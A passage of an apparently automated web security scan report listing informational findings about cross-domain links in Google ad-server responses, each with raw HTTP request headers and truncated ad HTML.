<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><iframe width="160" height="600" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="http://cdn.w55c.net/i/0RDMd2Pp56_1855871382.html?rtbhost=rts-rr12.sldc.dataxu.net&btid=NERCNDQwNkIwMDBDMDc5MTBBRTU4MzQ4MUE0NzIwQjd8R0Y4akFtdlVzNnwxMzAzNjU4NjA1ODQzfDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8MjA0NTE1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAawAMB5EK5YNIGkcgtwSIa-YP3wHbrdXB1w&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5OXBpbjNiag&ciu=MFJETWQyUHA1Ng&reqid=NERCNDQwNkIwMDBDMDc5MTBBRTU4MzQ4MUE0NzIwQjc&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=204&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&"> </iframe>
...[SNIP]...

23.449. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676403&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658403541&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658403548&frm=1&adk=513358139&ga_vid=764788207.1303658404&ga_sid=1303658404&ga_hid=1212953574&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=10 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:20:00 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1366

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><iframe width="728" height="90" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="http://cdn.w55c.net/i/0RkPQrQRFy_1341446950.html?rtbhost=rts-rr11.sldc.dataxu.net&btid=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQUXJRUkZ5fEVYXzEwMjM0NzcyMDZ8MTM4OTYy&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_oAAIeAsK5X6IMLFNiw5YQb_V37aYux-2HA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEYzTllTc2l3dw&ciu=MFJrUFFyUVJGeQ&reqid=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=138&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&"> </iframe>
...[SNIP]...

23.450. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303679586&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F24%2Fdork%2Freflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-pubretaileramazonnet.html&dt=1303661622765&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303661622782&frm=0&adk=1607234649&ga_vid=1322293598.1303661623&ga_sid=1303661623&ga_hid=637816283&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&eid=33895130&fu=0&ifi=1&dtd=37&xpc=hbxDhW5JKe&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://xss.cx/2011/04/24/dork/reflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-pubretaileramazonnet.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:13:42 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13245

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/24/dork/reflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-pubretaileramazonnet.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.dell.com/business%26adT%3DSQL%2BServer%2BManagement%26adU%3Dvulnerability.scan.qualys.com%26adT%3DWireless%2BVulnerability%26adU%3Dprweb.com%26adT%3DPRWeb%2BPress%2BReleases%26gl%3DUS&amp;usg=AFQjCNGSmDg1cUf7nCoj8rqpDNrW4hnRhA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.451. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679907&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661907896&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661907907&frm=1&adk=2614322350&ga_vid=1772073814.1303661908&ga_sid=1303661908&ga_hid=514131103&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:18:25 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14792

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Cadillac.com/Escalade%26adT%3DMB%2BGL-Class%2Bvs%2BEscalade%26adU%3Darenasportsgrille.com%26adT%3DARENA%2BSports%2BBar%2B%2526amp%253B%2BGrill%26adU%3Dwww.GMC.com/Yukon%26adT%3DMB%2BGL450%2Bvs%2BGMC%2BYukon%26adU%3Dwww.GetBuzztime.com%26adT%3DCreate%2BPromotions%26adU%3DPeru.travel%26adT%3DWhen%2Bvisiting%2BPeru%26gl%3DUS&amp;usg=AFQjCNH6z552LjmZCfsSnhc2wC2gCRNYsg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.452. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676660&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658660953&bpp=9&shv=r20110420&jsv=r20110415&correlator=1303658660965&frm=1&adk=2614322350&ga_vid=1762053620.1303658661&ga_sid=1303658661&ga_hid=934351659&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=15 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:24:18 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2167

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25673337&ahcid=840118&bimpd=FcNIhmMMQSMcmqVTsclvplb9ewTMxOp25EblA9yiFVU6PkHztrWmyxWveVilkhwYE2daTDp8iFSmrzkfWbLrzq9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BNTVfDaMWtGLJmN9PvDZhOlBYthQ5aCQ1mYSBEHRt8oSk9ydg04sOwARxmm8wMcfLZg0pkLSmXb9kMT6fUvaQOnTnt-vTTl1ccgclwVJEKA436waAnwiGEagegQWICZbOtsyyRQeXkTM-mPAHCYWjQchCho2vQFkPDNWqOr73J9bPQ132Ppbuk7ijoUndfzz7p0l40_4cIK_dVeFuq6yQtUQtPUcUlC_s56T2e_ZUTBrjxudTmqB9Q8IbbO-zxdWHQaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7Iyw6uq0xJRP_FbHyt9ZNiNFVcTUxG7t3A6NzatYRd4Lm-a333a7UvwhV1lDapSbKjX91mNtx9s8FQapZIbkQ1tO176w3mh_t7mVXDw8Rxd3g7JGonBv1VxN8EXFLlC0Nvni-SYlmeUF3Nm1iaLhF9kwA_xOrfycUFDp6u0zpJ64rt_T370WDWWY1SqEwEJwbh67avgm6Atn0OkHl8s2_rLjYvoIhw6vwnl4MOBUT5NT5A9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbRAoQAPHAsK5XcLGnBy3IYhoriiJ7Sfhk6PGQ&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBYf8KoUC0TYu4PIvulQfc5cHTAcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGt-LN3qDbiI2gAQ%26num%3D1%26sig%3DAGiWqtyr5_AzCD8u95t2bTaXLoZX0saauA%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.453. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679347&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661347006&bpp=2&shv=r20110420&jsv=r20110415&correlator=1303661347010&frm=1&adk=2614322350&ga_vid=708894165.1303661347&ga_sid=1303661347&ga_hid=955027229&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=6 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:09:04 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1836

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=5QzFHW-y8D_lDMUdb7LwPwAAAEAzMwdA5QzFHW-y8D_lDMUdb7LwP7zkV1ZoqVQpSsYda6b2ziUgS7RNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAKAcBAgUCAAQAAAAAxyLVlgAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+9797%2C+1303661344%29%3Buf%28%27c%27%2C+52368%2C+1303661344%29%3Buf%28%27r%27%2C+173254%2C+1303661344%29%3Bppv%288991%2C+%272978191519189034172%27%2C+1303661344%2C+1303704544%2C+52368%2C+25553%29%3B&cnd=!chDNzwiQmQMQxskKGAAg0ccBKEsxV_RVCW-y8D9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php&pp=TbRLIAAA0VQK7F7NwEhcf652Q8jf4CjJHrr0Jw&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBSMEqIEu0TdSiA829sQf_uKGCDNfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgC5gHAAgTIAoXSzwqoAwHoA7wB6AOUAvUDAAAAxIAG6LfOqsGOsobRAQ%26num%3D1%26sig%3DAGiWqtwu_xZ0ijvOML45dyfc2hZbxHNbcg%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.454. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658465628&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658465633&frm=1&adk=2614322350&ga_vid=256767513.1303658466&ga_sid=1303658466&ga_hid=375503836&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:21:02 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1280

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><iframe width="160" height="600" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="http://cdn.w55c.net/i/0RDMd2Pp56_1855871382.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NERCNDNGREUwMDBBMzc5ODBBRTU3RUNEMkE2ODc2QjR8R0YyY1FkMmI1VXwxMzAzNjU4NDY0NzM4fDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8Mjk5Njc1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_3gAKN5gK5X7NKmh2tAAE_twCii5ctWtVYQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5OXBpbjNiag&ciu=MFJETWQyUHA1Ng&reqid=NERCNDNGREUwMDBBMzc5ODBBRTU3RUNEMkE2ODc2QjQ&ccw=SUFCMSMwLjB8SUFCOCMwLjA&bp=299&zc=NzUyMDc&v=0&s=http%3A%2F%2F&"> </iframe>
...[SNIP]...

23.455. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680974&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662974358&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662974371&frm=1&adk=2614322350&ga_vid=1341995506.1303662974&ga_sid=1303662974&ga_hid=969217985&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=16 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:36:11 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14742

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BWeb%2BServer%26adU%3Dwww.bing.com/Local%26adT%3DAtlanta%2BIrish%2BRestaurants%26adU%3Darenasportsgrille.com%26adT%3DARENA%2BSports%2BBar%2B%2526amp%253B%2BGrill%26adU%3Dtripplite.com/RackSolutions%26adT%3DOpen%2BFrame%2BRacks%26adU%3Dwww.pickracks.com%26adT%3DSimplastics%25C2%25AE%2BPick%2BRacks%26gl%3DUS&amp;usg=AFQjCNGH1QfB6Ux8EBVnic1E17Ntsjc9bQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.456. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303683775&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F24%2Fdork%2Freflected-xss-ghdb-cross-site-scripting-example-poc-report-kroogycom.html&dt=1303665803588&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303665803592&frm=0&adk=1607234649&ga_vid=222413364.1303665804&ga_sid=1303665804&ga_hid=1487939608&ga_fc=0&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&fu=0&ifi=1&dtd=9&xpc=tWzhjT1KRk&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 17:23:21 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
